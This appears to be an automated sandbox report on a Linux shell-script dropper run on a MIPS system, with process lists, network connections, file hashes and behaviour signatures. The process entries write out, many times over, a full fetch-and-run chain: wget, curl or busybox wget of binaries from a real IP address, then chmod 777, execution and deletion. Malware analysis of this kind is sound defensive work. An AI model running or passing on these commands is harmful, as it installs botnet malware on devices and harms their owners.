[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/chmod

[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ

[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/rm

[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/chmod

[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc

[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/rm

[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/wget

[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/chmod

[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD

[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/rm

[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/wget

[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/chmod

[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/rm

[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/wget

[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/chmod

[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs

[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/rm

[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/wget

[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/chmod

[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G

[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/rm

[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/wget

[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/chmod

[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/rm

[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/wget

[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/802-1-0xb66c0000-0xb66d1044-memory.dmp

memory/879-2-0xb66f5000-0xb6706044-memory.dmp

memory/916-3-0xb6726000-0xb6737044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 07:29

Reported

2024-11-21 07:31

Platform

debian9-mipsbe-20240729-en

Max time kernel

72s

Max time network

75s

Command Line

[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls N/A
N/A /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs N/A
N/A /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs N/A
N/A /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G N/A
N/A /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb N/A
N/A /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe N/A
N/A /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm N/A
N/A /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 N/A
N/A /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc N/A
N/A /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD N/A
N/A /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn N/A
N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z N/A
N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm N/A
N/A /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 N/A
N/A /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn N/A
N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z N/A
N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc N/A
N/A /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD N/A
N/A /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs N/A
N/A /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs N/A
N/A /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G N/A
N/A /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls N/A
N/A /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb N/A
N/A /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /usr/bin/curl N/A
File opened for modification /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /usr/bin/curl N/A
File opened for modification /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /usr/bin/curl N/A
File opened for modification /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /usr/bin/curl N/A
File opened for modification /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /usr/bin/curl N/A
File opened for modification /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /usr/bin/curl N/A
File opened for modification /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /usr/bin/curl N/A
File opened for modification /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /usr/bin/curl N/A
File opened for modification /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /usr/bin/curl N/A
File opened for modification /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /usr/bin/curl N/A
File opened for modification /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /usr/bin/curl N/A
File opened for modification /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /usr/bin/curl N/A
File opened for modification /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /usr/bin/curl N/A
File opened for modification /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /usr/bin/curl N/A
File opened for modification /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /usr/bin/curl N/A
File opened for modification /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /usr/bin/curl N/A
File opened for modification /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /usr/bin/curl N/A
File opened for modification /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /usr/bin/curl N/A
File opened for modification /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /usr/bin/curl N/A
File opened for modification /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /usr/bin/curl N/A
File opened for modification /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /usr/bin/curl N/A
File opened for modification /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /usr/bin/curl N/A
File opened for modification /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /usr/bin/curl N/A
File opened for modification /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /usr/bin/curl N/A
File opened for modification /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /usr/bin/curl N/A
File opened for modification /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /usr/bin/curl N/A
File opened for modification /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /usr/bin/curl N/A
File opened for modification /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /usr/bin/curl N/A

Processes

/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh

[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/chmod

[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/rm

[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/wget

[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/chmod

[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/rm

[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/wget

[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/chmod

[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs

[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/rm

[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/wget

[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/chmod

[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G

[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/rm

[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/wget

[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/chmod

[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb

[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/rm

[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/wget

[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/chmod

[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe

[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/rm

[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/wget

[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/chmod

[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm

[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/rm

[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/wget

[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/chmod

[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6

[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/rm

[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/wget

[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/chmod

[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc

[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/rm

[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/wget

[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/chmod

[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD

[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/rm

[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/wget

[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/chmod

[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn

[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/rm

[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/wget

[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/busybox

